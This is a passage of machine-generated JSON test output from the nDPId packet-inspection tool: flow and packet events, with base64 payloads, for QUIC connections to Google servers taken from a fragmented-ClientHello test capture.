KHPU0Tg6vqeO8SzyLB\/n8diVDpb66xI152GpmYVi2GA2rWPfxVjszVl5jtF3gWEj8sOvNX3xomkTvDqEIOlWFIFjdzSMYAaE\/94dpPwrnlUXOlwVZbLyG8zBkrVJIJEL0VFlCRP3cPWR9GCwyqZp3TvaFXw65QoKcuAiLNfsKEEBT7thsxAP5ShRNnKnAVngImJT7\/QyRjMLgNdZQiVPKJgKxlHmR4CKW3EdPdCekSxLH3DqHQePQJoWyWmK2uMuElqVzImkMVeqUtVe1Z7XAmQ74ZmJX77RfTpYOUgTJWLw8yAw1CjfU5hA0NqXKDuF\/siEDZ0glp7FNdcWvBjbo\/ABe7QhVen4FOuDzJ7O3om6ZklR7mLYelWmYJHFfypdJF0Xj+hmRP2HWSSx4\/j6XqYC2eVviMKbyBDVQQPI0EM6QnNDTPPWP8a+XfmtmdlLc9QgUY0RmRpsrtKa+1IyPqG93eGTD+ZSsMgyIEQWA5Fm5wsK4NEmZ+pC9UWL57aEkWkIPEN4XlJ\/9JPPb3uZ2vDE\/Va0Bb1Y7vNFgBYQGZaZLzo9Gdz7yiHwLVKre1BC0kz+KfDM03+0yKx5CFVmJ\/kBO0+wIW17IRrXQXE0U0ProK9hPHRKvARb03bAuREr6TJR10+JsF1ImGW+lnDDK1\/FtTCgnzrxyWlFZM3Cg6kZN\/6ZrM2A49rBarb0aVirmITUvU59YafXCiT9ymjQXREvUsDHNYJ68Utiz2AdjCI7phJ86HXYCIFDLKUZ7rKmhC6fjynuAGp9kfCbPkPfnqyMDrXIJ"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501260783,"flow_last_seen":1621501260783,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501260783,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501260783,"flow_last_seen":1621501260783,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501260783,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1621501261082,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501261082,"pkt":"AAAAAAAAAAQAcbmbCABFAAViVMVAAH4RQ\/6fdbB8z3k\/XPqGAbsFTnp7xf8AAB0IqwzBH+7SJ6oAAEU0QCGjYmqsUMXHqnSGAa+SGBqQKewpsFPBcHbIO1VQVQmdi3mM6XPwhlgoWrccirvAt2h4VgoFMSMBKUnjc\/s7c31zMKNVAjGwqSS9UcMQe+beIWng48oRC5FQxFxp76d9NvJFZQrnobOu9\/OI9vLd\/kjxzUXkKaoMqPw3HA3NrHDmVaI1U1G916dAe3tpfhldRg8TG66kkZbvUPojfmBk6b2Z19o0wD3eL3ArF1ggKa7dtmOX3vPsGSHppdsAwy05mrGdBMogG2GNPoz1f6Mrx1CryOOeu7sX8P0doH1Sq0iFILD1hylRmMMZ5Opz0H2bi9KA7w\/Ag2fPK0T9oDIw0fFaoOFIf0DJ+lEFoJl+bUaUeYjpiNWRiJKG6uA\/8tslFXAk5id\/lQWKSBH2JicuyYgt3WXJe70ZAzp2iJ\/c\/DtJGyES\/AMV8JsInY9TNZ4RXPUu+I\/eX7SJpitBsTdhCEwJGiE0dT1TYgPIAD7IuBR125WX32fSO6pJg\/SC52+hata3geWR8gYaq0AXNqoDGePDOkIXu0L29JvXGLb3VjgkzsU7GDWMMiBS57s7K1nDWVaICtgb8tHvX+qm2yAEqxNTZylYIiRmNXEmMd4aEPfVCDRnoLnzwSUCqP2hNYKZWNP\/L4ttvwS03mes81iB3GFItzHUXUjDko+av7CA0J3KO8YO\/MegXhauhWaOMhTq9siY897rXz2nMEjgxielkq2WyMK6PT7GQGMUlCvVs2Lh0wr5fTdVSGH3n8y5kmB+Cpz3AWzqb0PCrL7nfp1ZQdKXBaV+\/8ls7T8As7zUGDLh1cEJLF5+OvQcPuWBETyYL6v6P0nP5uBkBK24BlVWM\/6sea6ivZVTU1ytJuTc4EW8eV7cOfQv3Z0ZvtO\/E+dtnWbRbm1+xnHQSTJejv0j+x\/5AGS7d9EBuJMkNcE8AQ4pldxgHz7Ptlg1BHWeyw3V53MEbQaaKLxV0WAfr2iBsH3t5M6hAvRICNnnoroLK7ICwfeGHvOCdHXa+iqtGu6TGnIJmUNgGQqP1S8MgI4WSJKg4gkxYOG8Yq8I6m3HzLsup78oZ6bqytrclhVLejrz8Tk1wQFWeJGz1cSVmJ7dlJY4MD8VT3IFiybLNnMNNe7YmlJus\/1uc9POON3uOlN0OXN57myRfkJk6aARYP\/VFYz2zQVzhOYWEpCg54BznwVNZxFF0LMNmGI2PVN06DbNXX9IxLaS+ptZnDWUEZKgww7Rh55OBQLkyONb3AXu68OQa9KfW6wKnH\/vmE8HYT6n+SXcK7GycIHau5AFjik2iCmv0VvdznzcaYCCq0Mfet4dNtH\/YoT\/I\/YrfjkCWn9TD2GpQpUNvMSERx6JmQCcnn6FUkuIqIOwQZ7TJ4fAgdop2a8RuxfgczRZ1qfymdRGBK2o+W0zafNFhHNk2SYmyvsZ1V8VBf\/oEixGqVnlZ\/Jq+d3sW39fHCM7TJKwcTtcBclxaa8fGLAAlW9lwT0AQAwjaArlz\/6Lw8tnHTm015jYFYAA5vZt1SyvuCzOL1voALV\/+nsbl3\/ONSPNJsDGJadYCDcjqbyAwc3rD2eTlnRMOCdPOfDkt6aPuNtwIQdnKz2fd4z8axtKYuzjc5dW0Vg4zcREoGQwXF3Mlfi7nUkcrBa7blnobGRnU3R82Mb1vEB9HojGcsN+QDpwTPjHZhspz1V5NyHgQ7hab2FBtan1NhmTF8w7rDqqAwRtjT1cqxDw9C9TkgJvOeDw\/J5ejOyPpxUe1E98wc8RMhxL8HbUxhU6"} 00636{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501261282,"flow_last_seen":1621501261282,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501261282,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1621501261282,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501261282,"pkt":"AAAAAAAAAAQA2OESCABFAAVibSVAAH4R2uk0uxSvypibefAsAbsFTt60w\/8AAB0IZEtuMTNmxFAAAEU0LH9lIIuMdZ7Kq5MCzCZAEE+168Yufakbt9pK0ksbFQo5gOkiaZtZmGL7ajorb6dlvPftlMSSvVuPm3GtlmjJiRJfcfSv6WCOpmfO2v6Vi8Gqe2z+CCwK+2m\/JLswIRcEtxYUQTR+mGEhGLqGsRBSch\/o0S7SruCC1QzCSC8G53\/qUYvkz+bnlIyDwadCcS+Bc5KcjL4tNroERGF7KikT1T9sF4XsS6GZZ5vImGfO3EkmUp8XE7jlVo8hS1am9\/dWmCCc\/5UVFDsBeuTG7wkgrb8swjB0805Wj9GAKKohjHey69GAIKPU3++2Imdagnr4acCwOFCrohzIIheL6xgOuccLlkxDVLjv32FfUde9yJXpLDBHMt76\/rduX6hlX68l11YNKGEr\/zkJxTj9ypa0blphHmap9\/VBxt4j+qGvE8cstJqh+0IpvOAVwU9lYmLuMLrq1nyWotlAq9mRnhXu+BQIbhgiYOfa+NaU9CqMuW+zTjv\/orQq5ERGPyXLWWaqpnLvACGfb9O5GE65tq9zbrPCgxRqZkEBql7CjsnZhZlmCr3gHvgCBq68gfxQu+39WkMzkvkbP8IALmggIQ7VQf8BFdayRba+Un3cP7f07rfoszy+m8D\/z0DW0SQgPeYsF\/KmQko4DJ59g8KzGl0re9gjZRv5RqIECyhlYHWJ7GyL1p6bli3WeNOhxQJ2LLSs7R5C1m3Adc0j0XFC1pB+sAW\/WEd5oLl9Hwjd6M0MklHMK0LYJJtSeHujnXWGQ8zBsv7diOFCmysv3C+aiX6B0P9ogHiAroIepHRii2maNhtRux1yyqTbuXMBGnRPqFAWbVaJQnNR1GwNd+qPfEmyFuIfG3xnj0aeWVINv8LvYzmYdOSTc7SL9gqYuvzHxRf1+Upzh4eF5QSLoWFnXPXL3449L3q0i+u80g9dZ3zpdrqQOpENcencZZGYbAgeK541RYNNro8eF8HwnYPBOIy\/Zl55vIK\/DEhSHnDpLGsakuI5sKTjtOeDx8DcJWgQ1BpawPb8oHOX7RqPhuxoKHRxFskxCDjHJh3ZT2U7YKpwgythqKBDauWw6V0hLNf6LNYtE9ypEHgKJ6trOXxgEDjS1iVFjdsX8YQ6+uIw\/VczFtSfg\/SPICVvTLXIAkfbMpSXSpbuwtaktICU2t9lJxcQPW3\/l2RVQlQ6A9orYmKqPcVckVDM+iHEIyMf9H4+vCZVgRIIICMwjlkLV5tcwaX0n7fRUHrmKaF8bEP9rGW60wBvfzerDhS2zUGBYaNPcvoOZQT2ZC\/EK4cXTZIBKvBIyWC72OiMtkS12h5aaPAtwZ6n2dXPCOk3d5CPWaaLjKOIMoQxRhJPD+tcF5lq+ivLDIhTHUNk3nCiT2ptn8sF5bPoqGsz0vo61bRIdmWMMojjGxrRSN7\/n7VJ7xjrskWBNwwKUBcjdFlM0H0heCJNg1grIB9Hn\/3GIWzCFZQ4MK0h3E8LnbseAq9C+ciIX45aTl8kFGqoSHjTiIRX1LhP\/Ej8fNDVJL8xCvYIK5uvMb5wfu4aPiMKEV+qyT2Ru5KgH3hlAbiLVCIDHX3NwF+qehB6sfUut4lougpqanWJ25xwUyKgjA21oplysL84+Pde6u0fQ1tsE4nXneYYoZdfcbHNS2+TcLpNnevmrlv8oGUF+IHSvQ2pys4po2Ft+zwvHiZVRUCkyaXat54kiLBaAYSl8PWx5iWyAEXxmiBRpM1GFaKzxBpGVsS6lfPmZGj\/E0GSH9ahQaWLKvJL1xv+z\/y5zk8w"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501261282,"flow_last_seen":1621501261282,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501261282,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ogs.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501261282,"flow_last_seen":1621501261282,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501261282,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ogs.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1621501261581,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501261581,"pkt":"AAAAAAAAAAQA2OESCABFAAVibS5AAH4R2uA0uxSvypibefAsAbsFTsIcwP8AAB0IZEtuMTNmxFAAAEU0JZ1KfLVI+JBmlx1gc1nZ06mlDQJxsWyoA2bzQbVVMhPumzwO3ZAR98o8ZPo9xLCUDTzGpsR1VmkqScVjzEZA\/RjIqIioWENrjUeZOvFpfzQMTLEtfK1H5gSkSzr1d9deTBzCPCECHyoWo01URci3jW51V0HbjDnEJD1I8iSzapavqXvkm7q\/CkPAOKz+EFk9ddN9tvBAUK+D6ra\/NoAZo9xXayAuRyx3iyJFB5EvlFUz1Sj7dTVlS5+TdfHDF6BCtxu\/3b6UGPME6BE0mv1zrD1kdQyNtPuDIptySY43Kas3SgvX\/I4v3DNRjU9o8CMW8YMBriuPdWaursmVudUTJYnB0q37mK+lxWkIltSWsQNuLr5cp6c4Vru0wwO0Ame+VygNGHbkKKCLw\/51hBpKkkTptkPAlMSaQQtKQI0OPuk7ItN4VrB+m9Vkwuz17+rymkBrFyMhsKcJIjj3luZReWaMMeNdN7r\/9xHAgrWKyyA3NzqfpYemGPDltByS1phr383eIdP8f5Ze0Ac0+tdcIJ2dWvbXqHhn3dZjhSk0HZZGEHnio7bqsyCfy\/wl3pykgp8G87hcfpY4upvLLmQRm6zklE2ZcD8mFhu4pD4VtgI4q1NkSPN4ENjVSltM1\/G\/SJCaisjk7\/TaytPYDocBazw8BpeLBGuMrWBrDpERso7obnHeO8wf+Lzqup7YnGDMt9vWazQbf5KRZY344vRrcxm8Cgm6xrf7EN0vEZrGdmbVtBvFwjU01hxeAVD8m7tC88nDxYD\/Vcms+kgEHQFUG5VPiMI1EaEjp4uM84vZhZhC6CDRHypPGw9HGqiPK3b\/Pd6yKRggtZr\/oWcBajQm0w+tBJKdOv7x6ZSHD5PhdRlgANNg\/jeNfdV0X5QnhkLi02ZeZq8yEDPFn9a3Lnz57TXoXYYfH6skWRGwGSQ2xHufw0DtBDB91pQTHPRFqigTQMOkcbUHvQ9FLSynEnElkdYIwyDeYl1wlkOI3z6haMDXB1V3RpZHuXa5GdOGVPCXKGY8TvCCd23w7RNdvgI0SAkP50qXRP4Kk2X1AVVlqpYf8FwiZi9W0HEiDmKaHfCa6sFt1\/rgrqUUw5ELhzKrL6pJ+lTg3H5NM0cd0C4hTHBtzSm3C5D7f92zskegG0WyFRw1Ba8N8vzkk3+Qhp\/je68IXQzCUe2u\/EtUX6CQYfCYIoWtYM8z5STiqZadSz8Hcj8gkMjUYbOqoFONvZacfYEHB0SARvuLReB4iTtWuIXgjYJcb5Qkm+SBb46jf\/04rZRrUrWfuW4MRTyzVXxCithuxVhs4F8PHfdPTq\/LCBBTHWDTyCQfTKVPq8P8t30ZnQWxsuPjLcSqLk2yTFwMtN32Tpl6KkT++kfElEUN8g20QBH4D3nsWOQyXh1qp6BLTCOt0IKBckhyNskXvMkS9f6xJSD6uYDR8gpfSiiduxVMENXsD+aZg0sKhc1tnhY564nzvmzaK5pK\/mG4HpcEZaoQlPnN9CVVFsxc\/AdJrQTcfRaJiP8\/\/Yg3DwS0RE3P4jvs8+29fssz2Vycvc4CcLnL6CYBjQV+ee549uL3GVp1M5HV3WkcafyAbynhL22G3n+0pOA92LLDWaPxdPw5GuPkVaJx0v0qoyE9b4AZ\/f7JyiBWPsZeIMB4ss18qfbar1+hhPvrhcG72WrRn1MOHBG\/UEQi0IsO4yKvwqiblXD9HjT\/0dhqt\/RFTAwug67Fa0M1R4Gf6vwbZT92OzvcYVJR3zAK+LRbdOlVy90zr3DQGbvb"} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1621501261682,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501261682,"pkt":"AAAAAAAAAAQAcbmbCABFAAViVOJAAH4RQ+GfdbB8z3k\/XPqGAbsFTv9fx\/8AAB0IqwzBH+7SJ6oAAEU0U9sthnA8M57fkNsMeJ2EE1SHED6gJhbQN4BfQJOO1PjffFq3gtFk4IyP8Wth3mraFF35AS\/mCSP5GPdO\/bY3uB7Y7VeiLUEY9IS2dFIrYZfbf9ZQsemW2z0+VCxvN2Db9C7578kBNAZHcZiUcQFU7QlwuGC4nwNjsiuK0SteLVHFM0d8O27xz2JpZUPDhtvrtHPERZTudFi1Sej11OjXXeMujoumIvT2OYdCj+X0NfUPlwu9sFCLpzinhlfbOthWMWB8q\/9N\/OyqjEr4qbDQGFnM\/Hr8eJUBkqVZluSAYj1Ywh29XdTMOcq5AUfmyV1X0sTrgeDtnbqi3godsTwx1QbwhKBj2dWTyYyHTDajH+2UBid1GebdhLGSjjnKxxAaaw6EFgQmpu7koEqoPObHp5kFU7wjAY8mggUyFBVjUIfNBYhWssGwyT5Z\/r5OGZuX1rx6tRJJm6gIeL60FE9LVHmgWUsYaHuVYpkqJgZrs8PzckQh0niaraVIhLPsP0c2zyZ8p6k39xAgrRwfx\/Zh9nPNn3qSfxXEzLRxlRYWUsplPXqYbIcReCdkDC\/N5gL1eP\/jiLz6QU52SRtg8taUEPRtc88DYo2jurpisQQ15KiRpuliwmtrhW0HqBvzdAZZarXSjJIjkWxLUUFMahlxZEceLNdSqe7MdK1UkaKw83287xEiaSEO7eTUM+\/wBRhGZf\/1DB70GE\/ULxXMbdJn9jltiavDAQNSyczf2+nbYlnG1N6O1TcuG42rxaHRd6KknCvWSCrAhQM\/VqLCDk0bY2mxWybhrjoGc0JuiCMFsYr+5pV5QRoX4Lq+e9gqBFnp3Uaem1xfnlWZMvZVrfurPDH1T3I4Dx8IroHaQ2Bo5DvKOdsiFkfzx2DBIq6SjpXaCsVzWBgmVAE9DRo2pY+eROHEOdfo8\/FBuCZXhbIlRq1heZJwhsmlY+7e2qNgtpC5DaW7zKw1HKVB0RPYT7VRcRTNl2g+fmbYvt3YQzNlorcN9OrbGF4EZ32C93f4\/HUQOVFV2yInR8hfRvuHsywq5N9zdnMDFx4UtoGC5\/JPOmqIglqIM9o0AUrBq4GdLXhfYvcFRKKHwZ7TRsYLwmoMgHWy8jwfHZhK1htPPyCu\/l8XN40QZGFptNt7D40U7OSwWUN1+psHOjRZWv6ST7CMmleHqyEPl1KLs2mifOpHcy+gSFbFBD6LLuLlmcGxRtETjrnZ7+bSuE+Zt8ruZaaGcSfNYzrqd1zOq56HYPd6nlE\/mmgkW8AFD4HgObgvdcHAI+BQl2HO3lTApnJPdlU4\/6LGlTjc\/Xy6ZatrCgtI9vY0+cPbiLZUSCI0nkM8mmbA2A5MknAZe\/w1hAi0GLW9UoOUSrCzacIaeo9N2SakmRlQF7OxrccNFQQ\/UxrBENXiSn8dd3pbynfOPUKA8bLUE0Fha7t882zmf3D2IV8UDrWHqT2rFiv6k3POzwJo9CVhSImVzpyIro243Q09zk2kOJxu0gB1BHDvYJrVOYEpZLmGM4H5HwzOJAsaUidoe7\/oRQyD8W5INMmeQBEWvyryJW11xgcq+r4ORSm2VIuTghtDpCYCC2hC9f+Dlxwu8h6CMW3kWH65itA1vwPXB6v+afYS01KWtxgI6eW\/NRjdMoX0SXGogIM7OSPQVVfkk4D2+dJAm44\/U0Vl4ZMoY08TeAfdXHgiERB0dXg4yr7L237fx9MyFJtNMScYo+op6Jjwo90fx4MlC9rlwatwxaF9nbgK0o\/x2ee6fFva6TLmGaGSkDA5"} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1621501262182,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501262182,"pkt":"AAAAAAAAAAQA2OESCABFAAVibTZAAH4R2tg0uxSvypibefAsAbsFThjAy\/8AAB0IZEtuMTNmxFAAAEU0P4kZL2JzcQJCkWJO7BYAvn7jOS\/oPDLLELaAGZjPfdWe+CTrIzdiC9WRX3rH+cQNjCKbZa53WspbrWQ3y9Iddgk3mFf\/\/P8OYcu5S5eZdMR9fbh3X6m7e1P0w349oYB4hiM9IJyVYjIofcoBFkKxh\/5ebxmzh+XjVHAni37hnczZyCzMbpvTaS5Mo2\/ZngECyPdTH4R55wpjirrbqawWK5BXgasVyeycq3PgcjRIEDZMmdGuCfn6Or6mlQ5Oi0gPVZivFAfQTbBQpALI5TF4c0OEuWkV5PvIlcn\/R7+MoVcxfy0r0Gxfy5DTUZSVKcVUqd7yhkU9aooVQ64ePPS85n0Ao6nJaHk4CEcKYTxXKFGTV\/JRmN1fStNbk6PuLzUzSKy7W3AsorHxQi\/LmRhIln15AQZY9aFzjxmdp89pwdjIhQaDCc86JMYVdSIXjTQq8957N1jOVphrIDogsXbfM+ETcmeLbNKqN4fwVd+mT\/89Wjg3KjoISCw7cizx3pwneM1IZWZxw32ejl27XFc+DeXbCTyms0wwx5d4mug4d1+BMTCaWAoTeBSMDXB0j0tkDNHX2xtWAXf8\/UuzEfOvYCbb04iQFTA+2Hyu4GRbvJwOTWHAb6Y\/V0BD9+rx2H6RD7LGvrHh+f8uY0EPosNsFiCs+3i7J7uh6lA7HBXpprFebhJ4nBFU5ogCjUR6v4cQw9N50B8pFKaCLLkzxxoYWvp6aFiNZxcUELv9ZUwZSWCw5u9TxfZdk+lnaGdGEYWUKBNrO4TMaapbDNq4j7Vu95JXokG49C08JF5JMM4\/z45it8ndhYZEyZbzHD2yExEQ\/VN\/mKUwF8ibUn2C67S\/5tn76v1S1e7HnOhXa9tt7ko7BC5wl0mN\/vl7Boa7BeFOH9ChJqMRyakFr8qtdw7Yu8g3vIiwJEWJpLTwekZqiekCkjohBvin+U4rI8Z4iedGc5HpW5HGFoexz0CrVl5wTxzNhI8j0IRw+jVswS8qYTpoGTz3OrlpPStmJil9HnykMux+BL5xXOZ617kkr3QdqqRshG\/RQrR8s6QAYGI71oEFLMM4TOShFAvx7OQRDnnJcVkbGzqXs2GA+ynEHK77vOrqNEjJpn4aKnbZnLLPOZDQS24eO\/QA+vv4uiLfH2hoxa65Oz8gK+JnY4IVu3sZb9w57SJTYpFHSRkiWRXzCJ\/sWWaohJYMR8PWJxuCKDHkDpOYFa4Gqs5Z2wJN\/RR3okXqWJS7yxFbWwGA\/Ux6HYdQ3Ct6YGwLA0DbmZnkDdT8uknz2+RUM8H5unZqgX4DQ6X6XF3z+e9cZs+qvkrBFmI7iTg\/AWeOO4DzvapIASiBIUwtJXKqd88VrnmgGNuzFGO317nsPM\/31UoR27Yt3dsU0KGRIpm65J\/+Rpqv+FCFt3c\/28P38sc1iZpuj4G1ByY3uO9KITABAM93OOoXZVsw4nYNriGxowgXJm4ZpYPg6mQ2LTkJ1L1uH0ng6enuR+XlH1t3Mdwkm8\/\/s+srKemwScHPxez2jonymTIlyHWEj43rE3SOOstfJJIdIbioCt5eaO4rJ\/ZtzFVP3GREeo2yr+vwPjDBvXv+9IKyIRXu1pKvuEupgzLBzLb+08gepp2KupXz5AcDO7p5JSUs7lVhZLWrwC\/4LgHlJK00\/IeVej+hl6DABvNdRucAzmPdswdQTBDGuRv2XQeZ5xK3vAhBPzvMWU8ulKLrK4WenJ6YSemx045mCE+N3D0BzGu5PxpiypXC1Fu+3yqrqa1cp13uQg0a"} 00637{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1621501305362,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501305362,"pkt":"AAAAAAAAAAQAtexhCABFAAViLHdAAH4R7mqfdbB8EM176sqQAbsFTpTBx\/8AAB0Ivw8tm2Ku7RQAAEU0Z52IbyPObDKu7BbGHFwXmr\/rz3QfyBRTJB3p2RnE9UysoDSL0A3iYi2pNKedwkl5mpvF\/Vk60tFlBZiFzkrxIN49ZjHA7MZQYh4BUIyAfPPuF03+ZMM0Su3qn9AiiUpsB+dNsu+962VPg19tLI\/VV6H3PHsG4PuMw4cn9i3LGYoZQn6aHv1YbAMYupJTDvNFcb2s6pFl8eB\/z0QA6+\/NcaLseMUOgNf8TfMmV5DJVFMWinQmIIE8GPttZVUixDh1PXr9\/XOfl5MsudOHGbS\/BoKDVUuxmXWMLXGEKU9H0vMlsYLhLUm0c3MDnKGeVSrkeYvPjroMfaat1Tiu2LmC1yjTT8Uvh3DZ3BJLLDzubsslmJNrUgLURH5a1TFkvH9Q96Xa\/CgdBXGH7ShdRTQlh7Spx9l0kHtYDDWtdmymj3cp0EdEjn\/au5ybI8UfXEQ40NFe\/bpqHpIm9OIaPawLRKnKVCmPwkTkJQmFtLRT8FIc+hxG8+42VlkD9SVwOketnoEDo67L6UjWGJq8Y0bKa6DKJrJHKlb1cBaN\/n0tnPhMblSJyBYOeYoXsn+gmj9b+VHHpisogUCwUgPQms6WZ1Tn+icYaQ+CSAy4kHR6jZ30M6ApyQmmHvzN14vvzh+CT59we\/MSd6bYyHCxqlNxNi9gnxXYBhI44N0AGk0Qqhje+CC0oYc8WWkUM1686AJps19dxQQb1m18EQJq7trGNUuhfyUdSuAwL\/l0h22i0uupo2DPl3o0+7Bt3qwlrzpKyCufm4ZmMAPpvK65nzp6cFH+pmlOQ7s2YRoxtUhnAtjgxag2R4\/nlewGsR9ygeGjxTA5LiirItmkj97AzgWwoIUP9ldEWuIUcvVhLe\/QB8zLa7AJgeB1R4vJAZowIkhS0+EMWrzuyLxX+IfaYE0iHLqkcbQA3BNqXFj4h621k+KIOiP4lvVResrE\/c+w\/Oj5tA1lx4837jiHi0YZT52YvwcFEmqMCZU8XqMRUIGXvjZqo9v4Gwo714AlFrATSjPNB0rwwMyUukaq\/3e3DvrcgQ9NGlBVWFxhz1tqnsLP7Kr\/srqsLf5Bw4wZJQF6sEZW4nlU